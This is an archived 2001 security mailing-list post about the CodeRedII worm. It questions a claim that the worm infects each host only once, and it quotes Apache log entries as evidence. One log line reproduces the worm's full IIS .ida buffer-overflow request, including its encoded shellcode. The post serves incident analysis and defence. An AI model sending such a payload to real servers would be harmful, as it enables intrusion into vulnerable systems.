> NOW: CodeRedII (this name is easily mistaken with CRv2, so i would suppose > another name: i stared calling it ida_root since my first analysis on 5th > aug, 7:34 GMT) > this worm alway only infects one host _once_. it checks for double infection. > it could generate the same ip address again in it's PRNG but the chance > this happening is near 0. you would think it should be near 0, but unless im mistaken this should be CR II correct? x.x.x.x - - [06/Aug/2001:09:18:20 -0500] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278 x.x.x.x - - [06/Aug/2001:09:18:23 -0500] <snip> x.x.x.x - - [06/Aug/2001:09:18:37 -0500] <snip> x.x.x.x - - [06/Aug/2001:09:18:37 -0500] <snip> x.x.x.x - - [06/Aug/2001:09:23:13 -0500] <snip> x.x.x.x - - [06/Aug/2001:09:23:44 -0500] <snip> x.x.x.x - - [06/Aug/2001:09:23:44 -0500] <snip> x.x.x.x - - [06/Aug/2001:09:23:53 -0500] <snip> x.x.x.x - - [06/Aug/2001:09:23:57 -0500] <snip> all from the same ip address out of my apache logs. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Aug 06 2001 - 13:07:13 PDT